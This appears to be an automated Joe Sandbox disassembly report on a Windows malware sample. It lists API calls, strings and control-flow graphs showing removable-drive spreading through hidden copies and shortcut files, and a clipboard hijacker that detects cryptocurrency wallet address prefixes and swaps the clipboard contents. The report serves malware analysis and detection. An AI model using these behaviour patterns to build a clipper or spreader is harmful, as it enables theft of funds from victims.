                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                    • String ID: $D$Gy@$open
                                                                                                                    • API String ID: 3787208655-4184347819
                                                                                                                    • Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                                                                    • Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
                                                                                                                    • Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                                                                    • Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59

                                                                                                                    Non-executed Functions

                                                                                                                    Function 004066B0 Relevance: 79.1, APIs: 35, Strings: 10, Instructions: 305fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 69 4066b0-4066c5 _chkstk 70 4066c7-4066c9 69->70 71 4066ce-406780 wsprintfW * 5 PathFileExistsW 69->71 72 406bb9-406bbc 70->72 73 406782-4067a3 call 40e770 71->73 74 4067c4-4067d3 PathFileExistsW 71->74 73->74 85 4067a5-4067be SetFileAttributesW DeleteFileW 73->85 76 406874-406883 PathFileExistsW 74->76 77 4067d9-4067e8 PathFileExistsW 74->77 78 406885-40688b 76->78 79 4068ca-4068eb FindFirstFileW 76->79 81 406809-406818 PathFileExistsW 77->81 82 4067ea-406803 SetFileAttributesW DeleteFileW 77->82 83 4068a5-4068b8 call 406460 78->83 84 40688d-4068a3 call 406460 78->84 86 4068f1-4069a9 79->86 87 406bb3 79->87 88 40681a-40682b CreateDirectoryW 81->88 89 40683c-40684b PathFileExistsW 81->89 82->81 100 4068bb-4068c4 SetFileAttributesW 83->100 84->100 85->74 92 4069b3-4069c7 lstrcmpW 86->92 87->72 88->89 93 40682d-406836 SetFileAttributesW 88->93 89->76 94 40684d-406863 CopyFileW 89->94 97 4069c9-4069dd lstrcmpW 92->97 98 4069df 92->98 93->89 94->76 99 406865-40686e SetFileAttributesW 94->99 97->98 101 4069e4-4069f5 97->101 102 406b8a-406ba0 FindNextFileW 98->102 99->76 100->79 104 406a06-406a0d 101->104 105 4069f7-406a00 101->105 102->92 103 406ba6-406bad FindClose 102->103 103->87 106 406a3b-406a44 104->106 107 406a0f-406a2c lstrcmpiW 104->107 105->104 110 406a46 106->110 111 406a4b-406a5c 106->111 108 406a30-406a37 107->108 109 406a2e 107->109 108->106 109->105 110->102 112 406a6d-406a74 111->112 113 406a5e-406a67 111->113 114 406ae4-406aed 112->114 115 406a76-406a93 PathMatchSpecW 112->115 113->112 116 406af4-406b03 PathFileExistsW 114->116 117 406aef 114->117 118 406a95 115->118 119 406a97-406add wsprintfW SetFileAttributesW DeleteFileW 115->119 120 406b05 116->120 121 406b0a-406b5a wsprintfW * 2 116->121 117->102 118->113 119->114 120->102 122 406b74-406b84 MoveFileExW 121->122 123 406b5c-406b72 call 406570 121->123 122->102 123->102
                                                                                                                    APIs
                                                                                                                    • _chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
                                                                                                                    • wsprintfW.USER32 ref: 004066EF
                                                                                                                    • wsprintfW.USER32 ref: 0040670F
                                                                                                                    • wsprintfW.USER32 ref: 0040672F
                                                                                                                    • wsprintfW.USER32 ref: 0040674F
                                                                                                                    • wsprintfW.USER32 ref: 00406768
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406778
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004067BE
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067CB
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067E0
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00406803
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406810
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406843
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
                                                                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$shell32.dll$shell32.dll
                                                                                                                    • API String ID: 2467965697-1256475382
                                                                                                                    • Opcode ID: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                                                                    • Instruction ID: f76dd7f444767b2c43f85b167d980272eeebb95a9fd79305f50fc2a4155965b0
                                                                                                                    • Opcode Fuzzy Hash: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                                                                    • Instruction Fuzzy Hash: BFD162B5900258ABCB20DF50DC44BEA77B8BB48304F0485EAF60AE6191D7B99BD4CF59
                                                                                                                    Function 00404970 Relevance: 70.9, APIs: 24, Strings: 16, Instructions: 905clipboardstringmemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 0040498C
                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D39
                                                                                                                    • StrStrW.SHLWAPI(00000000,cosmos), ref: 00404D61
                                                                                                                    • StrStrW.SHLWAPI(00000000,addr), ref: 00404D89
                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404DC4
                                                                                                                    • StrStrW.SHLWAPI(00000000,ronin:), ref: 00404DDB
                                                                                                                    • StrStrW.SHLWAPI(00000000,nano_), ref: 00404DF2
                                                                                                                    • StrStrW.SHLWAPI(00000000,bnb), ref: 004053A4
                                                                                                                    • StrStrW.SHLWAPI(00000000,bc1p), ref: 004053C0
                                                                                                                    • StrStrW.SHLWAPI(00000000,bc1q), ref: 004053DC
                                                                                                                    • StrStrW.SHLWAPI(00000000,ronin:), ref: 0040545F
                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00405479
                                                                                                                    • StrStrW.SHLWAPI(00000000,cosmos), ref: 00405493
                                                                                                                    • StrStrW.SHLWAPI(00000000,addr), ref: 004054AD
                                                                                                                    • StrStrW.SHLWAPI(00000000,nano_), ref: 004054C7
                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004054DC
                                                                                                                    • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 004054F7
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040550A
                                                                                                                    • memcpy.NTDLL(00000000,00000000,-00000001), ref: 00405528
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405534
                                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040553C
                                                                                                                    • EmptyClipboard.USER32 ref: 00405546
                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00405552
                                                                                                                    • CloseClipboard.USER32 ref: 00405558
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockmemcpy
                                                                                                                    • String ID: 8$addr$addr$bc1p$bc1q$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$nano_$nano_$ronin:$ronin:$A
                                                                                                                    • API String ID: 2017104846-3944006828
                                                                                                                    • Opcode ID: f10c215015187a64e35910754edbf43630524a633ee39edfa593be9c6f415941
                                                                                                                    • Instruction ID: c0db1a85d2b2ab719742c03712a747d69443af7a5f19e9c3a62e09ec18ebafc2
                                                                                                                    • Opcode Fuzzy Hash: f10c215015187a64e35910754edbf43630524a633ee39edfa593be9c6f415941
                                                                                                                    • Instruction Fuzzy Hash: E2822A70600218EACB648F45C0945BE7BB2EF82755F60C06BE8496F294D77CDED1EB98
                                                                                                                    Function 00407B20 Relevance: 62.3, APIs: 34, Strings: 1, Instructions: 1037COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 673498613-3233089245
                                                                                                                    • Opcode ID: 94dc8271308eded007e7ea5b0fb9da388c093141b97384e1eb8e9f213d101719
                                                                                                                    • Instruction ID: c2d4c50a35bfe5f8cd224c9e55e2257f54aee963b80b02c573e24d91c8b8cf0b
                                                                                                                    • Opcode Fuzzy Hash: 94dc8271308eded007e7ea5b0fb9da388c093141b97384e1eb8e9f213d101719
                                                                                                                    • Instruction Fuzzy Hash: 40D22A79D11619EFCB54CF99C18099EFBF1FF88360F62859AD845AB305C630AA91DF80
                                                                                                                    Function 00407B49 Relevance: 52.0, APIs: 34, Instructions: 1023COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 673498613-0
                                                                                                                    • Opcode ID: f562728b4ae2ad839a046a61e7ae0d2c61abff421672d19278971dcd63bd6e21
                                                                                                                    • Instruction ID: bf2a4b6287689beed617d1f95a7506b70f8f7bc33f40ac888a8e51c3a2640481
                                                                                                                    • Opcode Fuzzy Hash: f562728b4ae2ad839a046a61e7ae0d2c61abff421672d19278971dcd63bd6e21
                                                                                                                    • Instruction Fuzzy Hash: 5FD22A79D11619EFCB54CF99C18099EFBF1FF88360F62859AD845AB305C630AA91DF80
                                                                                                                    Function 00406570 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85filestringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 582 406570-4065bf CreateDirectoryW wsprintfW FindFirstFileW 583 4065c5-4065d9 lstrcmpW 582->583 584 40669f-4066a2 582->584 585 4065f1 583->585 586 4065db-4065ef lstrcmpW 583->586 588 40666c-406682 FindNextFileW 585->588 586->585 587 4065f3-40663c wsprintfW * 2 586->587 589 406656-406666 MoveFileExW 587->589 590 40663e-406654 call 406570 587->590 588->583 591 406688-406699 FindClose RemoveDirectoryW 588->591 589->588 590->588 591->584
                                                                                                                    APIs
                                                                                                                    • CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
                                                                                                                    • wsprintfW.USER32 ref: 00406595
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004065AC
                                                                                                                    • lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
                                                                                                                    • lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
                                                                                                                    • wsprintfW.USER32 ref: 0040660A
                                                                                                                    • wsprintfW.USER32 ref: 0040662A
                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040668F
                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00406699
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                    • String ID: %s\%s$%s\%s$%s\*$ok@
                                                                                                                    • API String ID: 92872011-32713442
                                                                                                                    • Opcode ID: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                                                                    • Instruction ID: 6b6780eb73bc58f0ce40e07c43f053b4d902fc918dfc6bbc5558198ff1b4ac31
                                                                                                                    • Opcode Fuzzy Hash: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                                                                    • Instruction Fuzzy Hash: AB3127B5900218AFCB10DB60EC89FDA7778BB48701F4085A9F609A3195DB75DAD4CF58
                                                                                                                    Function 00405970 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 594 405970-405992 GetWindowLongW 595 405994-40599b 594->595 596 4059b6-4059bd 594->596 597 4059a1-4059a5 595->597 598 405a27-405a38 IsClipboardFormatAvailable 595->598 599 4059e6-4059ec 596->599 600 4059bf 596->600 601 4059c4-4059e1 SetClipboardViewer SetWindowLongW 597->601 602 4059a7-4059ab 597->602 606 405a43-405a4d IsClipboardFormatAvailable 598->606 607 405a3a-405a41 598->607 604 405a06-405a0a 599->604 605 4059ee-405a04 SetWindowLongW 599->605 603 405ba4-405bbd DefWindowProcA 600->603 601->603 608 4059b1 602->608 609 405b5d-405b9e RegisterRawInputDevices ChangeClipboardChain 602->609 610 405a22 604->610 611 405a0c-405a1c SendMessageA 604->611 605->610 613 405a58-405a62 IsClipboardFormatAvailable 606->613 614 405a4f-405a56 606->614 612 405a6b-405a6f 607->612 608->603 609->603 610->603 611->610 616 405a75-405a7f OpenClipboard 612->616 617 405b3f-405b43 612->617 613->612 615 405a64 613->615 614->612 615->612 616->617 618 405a85-405a96 GetClipboardData 616->618 619 405b45-405b55 SendMessageA 617->619 620 405b5b 617->620 621 405a98 618->621 622 405a9d-405aae GlobalLock 618->622 619->620 620->603 621->603 623 405ab0 622->623 624 405ab5-405ac6 622->624 623->603 625 405ac8-405acc 624->625 626 405ae9-405afc call 405690 624->626 628 405afe-405b0e call 4057b0 625->628 629 405ace-405ad2 625->629 634 405b11-405b25 GlobalUnlock CloseClipboard 626->634 628->634 632 405ad4 629->632 633 405ad6-405ae7 call 405570 629->633 632->634 633->634 634->617 637 405b27-405b3c call 404970 call 40a1b0 634->637 637->617
                                                                                                                    APIs
                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040597C
                                                                                                                    • SetClipboardViewer.USER32(?), ref: 004059C8
                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405A77
                                                                                                                    • GetClipboardData.USER32(00000000), ref: 00405A89
                                                                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
                                                                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405B9E
                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3549449529-0
                                                                                                                    • Opcode ID: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                                                                    • Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
                                                                                                                    • Opcode Fuzzy Hash: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                                                                    • Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69
                                                                                                                    Function 00406BC0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106sleepthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00406BCE
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00415E58,00000104), ref: 00406BE0
                                                                                                                      • Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                                                                      • Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                                                                      • Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                                                                    • ExitThread.KERNEL32 ref: 00406D4A
                                                                                                                      • Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                                                                      • Part of subcall function 004063A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                                                                      • Part of subcall function 004063A0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                                                                      • Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 00406D3D
                                                                                                                      • Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
                                                                                                                    • wsprintfW.USER32 ref: 00406CC2
                                                                                                                    • wsprintfW.USER32 ref: 00406CE2
                                                                                                                    • wsprintfW.USER32 ref: 00406D05
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                    • API String ID: 1650488544-2117135753
                                                                                                                    • Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                                                                    • Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
                                                                                                                    • Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                                                                    • Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A
                                                                                                                    Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                      • Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E
                                                                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                                                                    • htons.WS2_32(?), ref: 00402101
                                                                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                      • Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                                                                      • Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                                                                      • Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                                                                      • Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1603358586-0
                                                                                                                    • Opcode ID: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                                                                    • Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
                                                                                                                    • Opcode Fuzzy Hash: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                                                                    • Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A
                                                                                                                    Function 0040D710 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117networkstringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                                                                    • htons.WS2_32(0000076C), ref: 0040D760
                                                                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                                                                      • Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
                                                                                                                      • Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                                                                      • Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                                                                      • Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                                                                    • lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                                                                    • sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                                                                      • Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                                                                      • Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                                                                      • Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                                                                      • Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                                                                      • Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                    • String ID: 239.255.255.250
                                                                                                                    • API String ID: 726339449-2186272203
                                                                                                                    • Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                                                                    • Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
                                                                                                                    • Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                                                                    • Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69
                                                                                                                    Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
